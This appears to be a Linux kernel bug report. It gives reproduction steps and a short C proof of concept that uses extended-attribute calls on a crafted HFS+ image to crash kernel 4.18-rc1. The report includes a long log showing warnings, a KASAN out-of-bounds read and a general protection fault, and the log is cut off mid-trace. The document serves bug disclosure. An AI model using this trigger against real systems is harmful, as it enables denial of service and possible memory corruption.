Created attachment 276889 [details] The (compressed) crafted image which causes crash - Reproduce (4.18) # mkdir mnt # mount -t hfsplus 3.img mnt # gcc -o poc poc.c # ./poc ./mnt - POC (poc.c) #define _GNU_SOURCE #include <sys/types.h> #include <sys/mount.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/xattr.h> #include <dirent.h> #include <errno.h> #include <error.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <linux/falloc.h> #include <linux/loop.h> static void activity(char *mpoint) { char *xattr; int err; static int buf[8192]; memset(buf, 0, sizeof(buf)); err = asprintf(&xattr, "%s/foo/bar/xattr", mpoint); // xattr char buf2[113]; memset(buf2, 0, sizeof(buf2)); listxattr(xattr, buf2, sizeof(buf2)); removexattr(xattr, "user.mime_type"); setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE); setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_REPLACE); } int main(int argc, char *argv[]) { activity(argv[1]); return 0; } - Kernel message [ 278.718053] hfsplus: new node 0 already hashed? [ 278.719227] WARNING: CPU: 1 PID: 1410 at fs/hfsplus/bnode.c:584 hfsplus_bnode_create+0x1f3/0x200 [ 278.719233] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 278.719627] CPU: 1 PID: 1410 Comm: a.out Not tainted 4.18.0-rc1+ #6 [ 278.719630] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 278.719641] RIP: 0010:hfsplus_bnode_create+0x1f3/0x200 [ 278.719643] Code: 4c 89 ff e8 ef f4 ff ff 48 83 c4 08 48 c7 c0 fb ff ff ff 5b 41 5c 41 5d 41 5e 41 5f 5d c3 48 c7 c7 a0 38 96 ae e8 b1 ba bb ff <0f> 0b 4c 89 e0 eb c0 66 0f 1f 44 00 00 66 66 66 66 90 55 48 89 e5 [ 278.719698] RSP: 0018:ffff8801e8db7308 EFLAGS: 00010286 [ 278.719708] RAX: 0000000000000023 RBX: ffff8801e07a006c RCX: 0000000000000000 [ 278.719710] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003d1b6e57 [ 278.719713] RBP: ffff8801e8db7338 R08: ffffed003ede4f21 R09: ffffed003ede4f21 [ 278.719716] R10: 0000000000000001 R11: ffffed003ede4f20 R12: ffff8801e082db80 [ 278.719718] R13: 0000000000000000 R14: ffff8801e07a0000 R15: ffff8801e07a0000 [ 278.719722] FS: 00007f5a92cc6700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000 [ 278.719725] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 278.719728] CR2: 00007f5a9272e170 CR3: 00000001e5612000 CR4: 00000000000006e0 [ 278.719739] Call Trace: [ 278.719753] hfsplus_bmap_alloc+0x671/0x690 [ 278.719760] ? hfsplus_btree_write+0x1d0/0x1d0 [ 278.719800] ? remove_stable_node+0x78/0xa0 [ 278.719809] ? hfsplus_strcmp+0x97/0xe0 [ 278.719816] ? memcpy+0x45/0x50 [ 278.719821] ? hfsplus_bnode_read+0xb1/0x140 [ 278.719827] hfs_bnode_split+0xb2/0x6b0 [ 278.719830] ? memcpy+0x45/0x50 [ 278.719835] ? hfsplus_bnode_read+0xb1/0x140 [ 278.719840] ? hfs_bnode_need_zeroout+0x80/0x80 [ 278.719845] ? hfsplus_bnode_read_u16+0x6e/0xa0 [ 278.719849] ? hfsplus_bnode_read+0x140/0x140 [ 278.719855] hfsplus_brec_insert+0x1d6/0x6c0 [ 278.719861] ? hfsplus_brec_keylen+0x130/0x130 [ 278.719866] ? __kmalloc+0x11f/0x240 [ 278.719872] hfsplus_create_attr+0x263/0x2b0 [ 278.719877] ? hfsplus_attr_exists+0x140/0x140 [ 278.719913] ? strncmp+0x3d/0xc0 [ 278.719919] __hfsplus_setxattr+0x2d5/0x1160 [ 278.719950] ? unwind_get_return_address+0x36/0x50 [ 278.719956] ? kasan_check_write+0x14/0x20 [ 278.719971] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 278.719978] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 278.719982] ? save_stack+0x46/0xd0 [ 278.719986] ? kasan_kmalloc+0xad/0xe0 [ 278.719990] ? kmem_cache_alloc_trace+0x102/0x200 [ 278.719994] ? hfsplus_setxattr+0x4c/0xb0 [ 278.719998] ? hfsplus_user_setxattr+0x27/0x30 [ 278.720011] ? __vfs_setxattr+0x7c/0xa0 [ 278.720015] ? __vfs_setxattr_noperm+0x8d/0x200 [ 278.720019] ? vfs_setxattr+0xb3/0xc0 [ 278.720022] ? setxattr+0x1b3/0x260 [ 278.720026] ? path_setxattr+0x134/0x170 [ 278.720029] ? __x64_sys_setxattr+0x6d/0x80 [ 278.720042] ? do_syscall_64+0x78/0x170 [ 278.720047] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.720052] ? save_stack+0xb5/0xd0 [ 278.720055] ? save_stack+0x46/0xd0 [ 278.720058] ? kasan_kmalloc+0xad/0xe0 [ 278.720062] ? __kmalloc_node+0x11e/0x2e0 [ 278.720078] ? kvmalloc_node+0x31/0x80 [ 278.720082] ? setxattr+0x114/0x260 [ 278.720086] ? path_setxattr+0x134/0x170 [ 278.720089] ? __x64_sys_setxattr+0x6d/0x80 [ 278.720093] ? do_syscall_64+0x78/0x170 [ 278.720098] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.720102] ? save_stack+0xb5/0xd0 [ 278.720105] ? save_stack+0x46/0xd0 [ 278.720109] ? __kasan_slab_free+0x13c/0x1a0 [ 278.720112] ? kasan_slab_free+0xe/0x10 [ 278.720116] ? kmem_cache_free+0x89/0x1e0 [ 278.720125] ? putname+0x80/0x90 [ 278.720129] ? filename_lookup+0x191/0x280 [ 278.720133] ? kasan_unpoison_shadow+0x36/0x50 [ 278.720137] ? kasan_kmalloc+0xad/0xe0 [ 278.720142] ? kmem_cache_alloc_trace+0x102/0x200 [ 278.720148] hfsplus_setxattr+0x8a/0xb0 [ 278.720152] hfsplus_user_setxattr+0x27/0x30 [ 278.720156] __vfs_setxattr+0x7c/0xa0 [ 278.720161] __vfs_setxattr_noperm+0x8d/0x200 [ 278.720165] vfs_setxattr+0xb3/0xc0 [ 278.720170] setxattr+0x1b3/0x260 [ 278.720174] ? vfs_setxattr+0xc0/0xc0 [ 278.720178] ? filename_lookup+0x191/0x280 [ 278.720182] ? filename_parentat+0x2b0/0x2b0 [ 278.720186] ? kasan_kmalloc+0xad/0xe0 [ 278.720191] ? kasan_check_write+0x14/0x20 [ 278.720213] ? strncpy_from_user+0xa8/0x1c0 [ 278.720226] ? __mnt_is_readonly.part.13+0x23/0x30 [ 278.720231] ? __mnt_want_write+0x9d/0xb0 [ 278.720236] path_setxattr+0x134/0x170 [ 278.720240] ? setxattr+0x260/0x260 [ 278.720249] ? vm_brk+0x20/0x20 [ 278.720255] __x64_sys_setxattr+0x6d/0x80 [ 278.720260] do_syscall_64+0x78/0x170 [ 278.720265] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.720285] RIP: 0033:0x7f5a927e71fa [ 278.720287] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 278.720343] RSP: 002b:00007ffd01ecc4f8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc [ 278.720347] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5a927e71fa [ 278.720350] RDX: 00007ffd01ecc520 RSI: 00000000004008a4 RDI: 0000000000d55080 [ 278.720353] RBP: 00007ffd01ecc5a0 R08: 0000000000000001 R09: 0000000000000000 [ 278.720355] R10: 0000000000000071 R11: 0000000000000202 R12: 00000000004005e0 [ 278.720361] R13: 00007ffd01ecc6a0 R14: 0000000000000000 R15: 0000000000000000 [ 278.720366] ---[ end trace 7f5a46c7478f1295 ]--- [ 278.720395] hfsplus: new node 0 already hashed? [ 278.721376] WARNING: CPU: 1 PID: 1410 at fs/hfsplus/bnode.c:584 hfsplus_bnode_create+0x1f3/0x200 [ 278.721377] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 278.721441] CPU: 1 PID: 1410 Comm: a.out Tainted: G W 4.18.0-rc1+ #6 [ 278.721444] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 278.721449] RIP: 0010:hfsplus_bnode_create+0x1f3/0x200 [ 278.721450] Code: 4c 89 ff e8 ef f4 ff ff 48 83 c4 08 48 c7 c0 fb ff ff ff 5b 41 5c 41 5d 41 5e 41 5f 5d c3 48 c7 c7 a0 38 96 ae e8 b1 ba bb ff <0f> 0b 4c 89 e0 eb c0 66 0f 1f 44 00 00 66 66 66 66 90 55 48 89 e5 [ 278.721505] RSP: 0018:ffff8801e8db7318 EFLAGS: 00010282 [ 278.721509] RAX: 0000000000000023 RBX: ffff8801e07a006c RCX: 0000000000000000 [ 278.721511] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003d1b6e59 [ 278.721514] RBP: ffff8801e8db7348 R08: ffffed003ede3ebb R09: ffffed003ede3ebb [ 278.721517] R10: 0000000000000001 R11: ffffed003ede3eba R12: ffff8801e082db80 [ 278.721519] R13: 0000000000000000 R14: ffff8801e07a0000 R15: ffff8801e07a0000 [ 278.721523] FS: 00007f5a92cc6700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000 [ 278.721525] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 278.721528] CR2: 00007f5a9272e170 CR3: 00000001e5612000 CR4: 00000000000006e0 [ 278.721532] Call Trace: [ 278.721540] hfsplus_bmap_alloc+0x671/0x690 [ 278.721545] ? hfsplus_btree_write+0x1d0/0x1d0 [ 278.721550] ? hfsplus_bnode_put+0x190/0x190 [ 278.721554] ? memcpy+0x45/0x50 [ 278.721559] ? hfsplus_bnode_read+0xb1/0x140 [ 278.721565] hfs_btree_inc_height+0xd3/0x450 [ 278.721569] ? hfs_brec_update_parent+0xa6/0x560 [ 278.721574] ? hfs_bnode_split+0x6b0/0x6b0 [ 278.721588] ? mark_page_accessed+0x133/0x200 [ 278.721594] ? hfsplus_bnode_put+0xb8/0x190 [ 278.721599] hfsplus_brec_insert+0x5a5/0x6c0 [ 278.721605] ? hfsplus_brec_keylen+0x130/0x130 [ 278.721609] ? __kmalloc+0x11f/0x240 [ 278.721615] hfsplus_create_attr+0x263/0x2b0 [ 278.721621] ? hfsplus_attr_exists+0x140/0x140 [ 278.721626] ? strncmp+0x3d/0xc0 [ 278.721632] __hfsplus_setxattr+0x2d5/0x1160 [ 278.721637] ? unwind_get_return_address+0x36/0x50 [ 278.721642] ? kasan_check_write+0x14/0x20 [ 278.721647] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 278.721653] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 278.721657] ? save_stack+0x46/0xd0 [ 278.721661] ? kasan_kmalloc+0xad/0xe0 [ 278.721665] ? kmem_cache_alloc_trace+0x102/0x200 [ 278.721669] ? hfsplus_setxattr+0x4c/0xb0 [ 278.721673] ? hfsplus_user_setxattr+0x27/0x30 [ 278.721677] ? __vfs_setxattr+0x7c/0xa0 [ 278.721680] ? __vfs_setxattr_noperm+0x8d/0x200 [ 278.721684] ? vfs_setxattr+0xb3/0xc0 [ 278.721687] ? setxattr+0x1b3/0x260 [ 278.721691] ? path_setxattr+0x134/0x170 [ 278.721694] ? __x64_sys_setxattr+0x6d/0x80 [ 278.721698] ? do_syscall_64+0x78/0x170 [ 278.721703] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.721708] ? save_stack+0xb5/0xd0 [ 278.721711] ? save_stack+0x46/0xd0 [ 278.721714] ? kasan_kmalloc+0xad/0xe0 [ 278.721718] ? __kmalloc_node+0x11e/0x2e0 [ 278.721723] ? kvmalloc_node+0x31/0x80 [ 278.721726] ? setxattr+0x114/0x260 [ 278.721730] ? path_setxattr+0x134/0x170 [ 278.721733] ? __x64_sys_setxattr+0x6d/0x80 [ 278.721737] ? do_syscall_64+0x78/0x170 [ 278.721746] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.721751] ? save_stack+0xb5/0xd0 [ 278.721776] ? save_stack+0x46/0xd0 [ 278.721780] ? __kasan_slab_free+0x13c/0x1a0 [ 278.721783] ? kasan_slab_free+0xe/0x10 [ 278.721787] ? kmem_cache_free+0x89/0x1e0 [ 278.721790] ? putname+0x80/0x90 [ 278.721794] ? filename_lookup+0x191/0x280 [ 278.721798] ? kasan_unpoison_shadow+0x36/0x50 [ 278.721802] ? kasan_kmalloc+0xad/0xe0 [ 278.721807] ? kmem_cache_alloc_trace+0x102/0x200 [ 278.721812] hfsplus_setxattr+0x8a/0xb0 [ 278.721817] hfsplus_user_setxattr+0x27/0x30 [ 278.721821] __vfs_setxattr+0x7c/0xa0 [ 278.721825] __vfs_setxattr_noperm+0x8d/0x200 [ 278.721830] vfs_setxattr+0xb3/0xc0 [ 278.721834] setxattr+0x1b3/0x260 [ 278.721838] ? vfs_setxattr+0xc0/0xc0 [ 278.721842] ? filename_lookup+0x191/0x280 [ 278.721846] ? filename_parentat+0x2b0/0x2b0 [ 278.721850] ? kasan_kmalloc+0xad/0xe0 [ 278.721855] ? kasan_check_write+0x14/0x20 [ 278.721860] ? strncpy_from_user+0xa8/0x1c0 [ 278.721865] ? __mnt_is_readonly.part.13+0x23/0x30 [ 278.721870] ? __mnt_want_write+0x9d/0xb0 [ 278.721874] path_setxattr+0x134/0x170 [ 278.721878] ? setxattr+0x260/0x260 [ 278.721882] ? vm_brk+0x20/0x20 [ 278.721887] __x64_sys_setxattr+0x6d/0x80 [ 278.721897] do_syscall_64+0x78/0x170 [ 278.721903] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.721906] RIP: 0033:0x7f5a927e71fa [ 278.721907] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 278.721962] RSP: 002b:00007ffd01ecc4f8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc [ 278.721966] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5a927e71fa [ 278.721969] RDX: 00007ffd01ecc520 RSI: 00000000004008a4 RDI: 0000000000d55080 [ 278.721972] RBP: 00007ffd01ecc5a0 R08: 0000000000000001 R09: 0000000000000000 [ 278.721974] R10: 0000000000000071 R11: 0000000000000202 R12: 00000000004005e0 [ 278.721976] R13: 00007ffd01ecc6a0 R14: 0000000000000000 R15: 0000000000000000 [ 278.721980] ---[ end trace 7f5a46c7478f1296 ]--- [ 278.725358] ================================================================== [ 278.726920] BUG: KASAN: slab-out-of-bounds in hfsplus_bnode_copy+0x2a8/0x360 [ 278.728353] Read of size 8 at addr ffff8801e082db60 by task a.out/1410 [ 278.730053] CPU: 1 PID: 1410 Comm: a.out Tainted: G W 4.18.0-rc1+ #6 [ 278.730056] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 278.730058] Call Trace: [ 278.730066] dump_stack+0x7b/0xb5 [ 278.730071] print_address_description+0x70/0x290 [ 278.730075] kasan_report+0x291/0x390 [ 278.730080] ? hfsplus_bnode_copy+0x2a8/0x360 [ 278.730090] __asan_load8+0x54/0x90 [ 278.730094] hfsplus_bnode_copy+0x2a8/0x360 [ 278.730099] ? hfsplus_bnode_write+0xc2/0x170 [ 278.730104] hfs_btree_inc_height+0x2b5/0x450 [ 278.730110] ? hfs_bnode_split+0x6b0/0x6b0 [ 278.730118] ? mark_page_accessed+0x133/0x200 [ 278.730124] ? hfsplus_bnode_put+0xb8/0x190 [ 278.730129] hfsplus_brec_insert+0x5a5/0x6c0 [ 278.730135] ? hfsplus_brec_keylen+0x130/0x130 [ 278.730139] ? __kmalloc+0x11f/0x240 [ 278.730146] hfsplus_create_attr+0x263/0x2b0 [ 278.730155] ? hfsplus_attr_exists+0x140/0x140 [ 278.730160] ? strncmp+0x3d/0xc0 [ 278.730165] __hfsplus_setxattr+0x2d5/0x1160 [ 278.730171] ? unwind_get_return_address+0x36/0x50 [ 278.730177] ? kasan_check_write+0x14/0x20 [ 278.730185] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 278.730191] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 278.730195] ? save_stack+0x46/0xd0 [ 278.730198] ? kasan_kmalloc+0xad/0xe0 [ 278.730202] ? kmem_cache_alloc_trace+0x102/0x200 [ 278.730207] ? hfsplus_setxattr+0x4c/0xb0 [ 278.730211] ? hfsplus_user_setxattr+0x27/0x30 [ 278.730217] ? __vfs_setxattr+0x7c/0xa0 [ 278.730227] ? __vfs_setxattr_noperm+0x8d/0x200 [ 278.730235] ? vfs_setxattr+0xb3/0xc0 [ 278.730239] ? setxattr+0x1b3/0x260 [ 278.730242] ? path_setxattr+0x134/0x170 [ 278.730246] ? __x64_sys_setxattr+0x6d/0x80 [ 278.730250] ? do_syscall_64+0x78/0x170 [ 278.730255] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.730260] ? save_stack+0xb5/0xd0 [ 278.730264] ? save_stack+0x46/0xd0 [ 278.730267] ? kasan_kmalloc+0xad/0xe0 [ 278.730271] ? __kmalloc_node+0x11e/0x2e0 [ 278.730275] ? kvmalloc_node+0x31/0x80 [ 278.730280] ? setxattr+0x114/0x260 [ 278.730285] ? path_setxattr+0x134/0x170 [ 278.730290] ? __x64_sys_setxattr+0x6d/0x80 [ 278.730298] ? do_syscall_64+0x78/0x170 [ 278.730302] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.730306] ? save_stack+0xb5/0xd0 [ 278.730309] ? save_stack+0x46/0xd0 [ 278.730312] ? __kasan_slab_free+0x13c/0x1a0 [ 278.730316] ? kasan_slab_free+0xe/0x10 [ 278.730320] ? kmem_cache_free+0x89/0x1e0 [ 278.730324] ? putname+0x80/0x90 [ 278.730329] ? filename_lookup+0x191/0x280 [ 278.730334] ? kasan_unpoison_shadow+0x36/0x50 [ 278.730341] ? kasan_kmalloc+0xad/0xe0 [ 278.730346] ? kmem_cache_alloc_trace+0x102/0x200 [ 278.730352] hfsplus_setxattr+0x8a/0xb0 [ 278.730356] hfsplus_user_setxattr+0x27/0x30 [ 278.730361] __vfs_setxattr+0x7c/0xa0 [ 278.730369] __vfs_setxattr_noperm+0x8d/0x200 [ 278.730374] vfs_setxattr+0xb3/0xc0 [ 278.730378] setxattr+0x1b3/0x260 [ 278.730382] ? vfs_setxattr+0xc0/0xc0 [ 278.730387] ? filename_lookup+0x191/0x280 [ 278.730391] ? filename_parentat+0x2b0/0x2b0 [ 278.730398] ? kasan_kmalloc+0xad/0xe0 [ 278.730403] ? kasan_check_write+0x14/0x20 [ 278.730408] ? strncpy_from_user+0xa8/0x1c0 [ 278.730413] ? __mnt_is_readonly.part.13+0x23/0x30 [ 278.730419] ? __mnt_want_write+0x9d/0xb0 [ 278.730426] path_setxattr+0x134/0x170 [ 278.730430] ? setxattr+0x260/0x260 [ 278.730434] ? vm_brk+0x20/0x20 [ 278.730438] __x64_sys_setxattr+0x6d/0x80 [ 278.730443] do_syscall_64+0x78/0x170 [ 278.730448] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.730453] RIP: 0033:0x7f5a927e71fa [ 278.730455] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 278.730525] RSP: 002b:00007ffd01ecc4f8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc [ 278.730529] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5a927e71fa [ 278.730532] RDX: 00007ffd01ecc520 RSI: 00000000004008a4 RDI: 0000000000d55080 [ 278.730534] RBP: 00007ffd01ecc5a0 R08: 0000000000000001 R09: 0000000000000000 [ 278.730538] R10: 0000000000000071 R11: 0000000000000202 R12: 00000000004005e0 [ 278.730542] R13: 00007ffd01ecc6a0 R14: 0000000000000000 R15: 0000000000000000 [ 278.730894] Allocated by task 1410: [ 278.731642] save_stack+0x46/0xd0 [ 278.731647] kasan_kmalloc+0xad/0xe0 [ 278.731651] __kmalloc+0x11f/0x240 [ 278.731657] __hfs_bnode_create+0xc6/0x3f0 [ 278.731665] hfsplus_bnode_find+0x1f0/0x500 [ 278.731669] hfsplus_brec_find+0x1c1/0x2e0 [ 278.731673] hfsplus_find_attr+0xb2/0xd0 [ 278.731676] hfsplus_listxattr+0x273/0x6e0 [ 278.731679] vfs_listxattr+0x9d/0xc0 [ 278.731684] listxattr+0x58/0xd0 [ 278.731689] path_listxattr+0xb9/0x120 [ 278.731692] __x64_sys_listxattr+0x48/0x50 [ 278.731700] do_syscall_64+0x78/0x170 [ 278.731705] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.732051] Freed by task 0: [ 278.732676] (stack is not available) [ 278.733779] The buggy address belongs to the object at ffff8801e082db00 which belongs to the cache kmalloc-96 of size 96 [ 278.736283] The buggy address is located 0 bytes to the right of 96-byte region [ffff8801e082db00, ffff8801e082db60) [ 278.738721] The buggy address belongs to the page: [ 278.739721] page:ffffea0007820b40 count:1 mapcount:0 mapping:ffff8801f6803500 index:0x0 [ 278.741355] flags: 0x2ffff0000000100(slab) [ 278.742229] raw: 02ffff0000000100 dead000000000100 dead000000000200 ffff8801f6803500 [ 278.743776] raw: 0000000000000000 0000000080200020 00000001ffffffff 0000000000000000 [ 278.745321] page dumped because: kasan: bad access detected [ 278.746786] Memory state around the buggy address: [ 278.747765] ffff8801e082da00: fb fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc [ 278.749249] ffff8801e082da80: fb fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc [ 278.750731] >ffff8801e082db00: 00 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc [ 278.752197] ^ [ 278.753497] ffff8801e082db80: 00 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc [ 278.754982] ffff8801e082dc00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [ 278.756448] ================================================================== [ 278.799025] Disabling lock debugging due to kernel taint [ 278.800160] general protection fault: 0000 [#1] SMP KASAN PTI [ 278.801417] CPU: 0 PID: 1410 Comm: a.out Tainted: G B W 4.18.0-rc1+ #6 [ 278.803004] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 278.804953] RIP: 0010:__memcpy+0x12/0x20 [ 278.805773] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4 [ 278.809613] RSP: 0018:ffff8801e8db7430 EFLAGS: 00010246 [ 278.810705] RAX: a805570000016000 RBX: 0000000000001000 RCX: 0000000000000200 [ 278.812157] RDX: 0000000000000000 RSI: 700556c000016000 RDI: a805570000016000 [ 278.813606] RBP: ffff8801e8db7450 R08: ffffed003e09c499 R09: ffffed003e09c499 [ 278.815062] R10: 0000000000000001 R11: ffffed003e09c498 R12: a805570000016000 [ 278.816505] R13: 700556c000016000 R14: ffff8801e082db60 R15: 0000000000001000 [ 278.817960] FS: 00007f5a92cc6700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 278.819599] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 278.820770] CR2: 00007f828de0901a CR3: 00000001e5612000 CR4: 00000000000006f0 [ 278.822230] Call Trace: [ 278.822757] ? memcpy+0x45/0x50 [ 278.823422] hfsplus_bnode_copy+0x333/0x360 [ 278.824287] ? hfsplus_bnode_write+0xc2/0x170 [ 278.825187] hfs_btree_inc_height+0x2b5/0x450 [ 278.826102] ? hfs_bnode_split+0x6b0/0x6b0 [ 278.826954] ? mark_page_accessed+0x133/0x200 [ 278.827856] ? hfsplus_bnode_put+0xb8/0x190 [ 278.828722] hfsplus_brec_insert+0x5a5/0x6c0 [ 278.829607] ? hfsplus_brec_keylen+0x130/0x130 [ 278.830539] ? __kmalloc+0x11f/0x240 [ 278.831283] hfsplus_create_attr+0x263/0x2b0 [ 278.832167] ? hfsplus_attr_exists+0x140/0x140 [ 278.833085] ? strncmp+0x3d/0xc0 [ 278.833771] __hfsplus_setxattr+0x2d5/0x1160 [ 278.834664] ? unwind_get_return_address+0x36/0x50 [ 278.835654] ? kasan_check_write+0x14/0x20 [ 278.836508] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 278.837443] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 278.838647] ? save_stack+0x46/0xd0 [ 278.839372] ? kasan_kmalloc+0xad/0xe0 [ 278.840149] ? kmem_cache_alloc_trace+0x102/0x200 [ 278.841115] ? hfsplus_setxattr+0x4c/0xb0 [ 278.841956] ? hfsplus_user_setxattr+0x27/0x30 [ 278.842869] ? __vfs_setxattr+0x7c/0xa0 [ 278.843658] ? __vfs_setxattr_noperm+0x8d/0x200 [ 278.844589] ? vfs_setxattr+0xb3/0xc0 [ 278.845347] ? setxattr+0x1b3/0x260 [ 278.846083] ? path_setxattr+0x134/0x170 [ 278.846895] ? __x64_sys_setxattr+0x6d/0x80 [ 278.847760] ? do_syscall_64+0x78/0x170 [ 278.848557] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.849629] ? save_stack+0xb5/0xd0 [ 278.850364] ? save_stack+0x46/0xd0 [ 278.851088] ? kasan_kmalloc+0xad/0xe0 [ 278.851862] ? __kmalloc_node+0x11e/0x2e0 [ 278.852690] ? kvmalloc_node+0x31/0x80 [ 278.853466] ? setxattr+0x114/0x260 [ 278.854206] ? path_setxattr+0x134/0x170 [ 278.855034] ? __x64_sys_setxattr+0x6d/0x80 [ 278.855898] ? do_syscall_64+0x78/0x170 [ 278.856694] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.857771] ? save_stack+0xb5/0xd0 [ 278.858501] ? save_stack+0x46/0xd0 [ 278.859226] ? __kasan_slab_free+0x13c/0x1a0 [ 278.860106] ? kasan_slab_free+0xe/0x10 [ 278.860901] ? kmem_cache_free+0x89/0x1e0 [ 278.861731] ? putname+0x80/0x90 [ 278.862421] ? filename_lookup+0x191/0x280 [ 278.863268] ? kasan_unpoison_shadow+0x36/0x50 [ 278.864181] ? kasan_kmalloc+0xad/0xe0 [ 278.864960] ? kmem_cache_alloc_trace+0x102/0x200 [ 278.865940] hfsplus_setxattr+0x8a/0xb0 [ 278.866734] hfsplus_user_setxattr+0x27/0x30 [ 278.867616] __vfs_setxattr+0x7c/0xa0 [ 278.868378] __vfs_setxattr_noperm+0x8d/0x200 [ 278.869275] vfs_setxattr+0xb3/0xc0 [ 278.870013] setxattr+0x1b3/0x260 [ 278.870706] ? vfs_setxattr+0xc0/0xc0 [ 278.871465] ? filename_lookup+0x191/0x280 [ 278.872307] ? filename_parentat+0x2b0/0x2b0 [ 278.873186] ? kasan_kmalloc+0xad/0xe0 [ 278.873976] ? kasan_check_write+0x14/0x20 [ 278.874831] ? strncpy_from_user+0xa8/0x1c0 [ 278.875700] ? __mnt_is_readonly.part.13+0x23/0x30 [ 278.876686] ? __mnt_want_write+0x9d/0xb0 [ 278.877516] path_setxattr+0x134/0x170 [ 278.878306] ? setxattr+0x260/0x260 [ 278.879037] ? vm_brk+0x20/0x20 [ 278.879695] __x64_sys_setxattr+0x6d/0x80 [ 278.880524] do_syscall_64+0x78/0x170 [ 278.881289] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.882338] RIP: 0033:0x7f5a927e71fa [ 278.883079] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 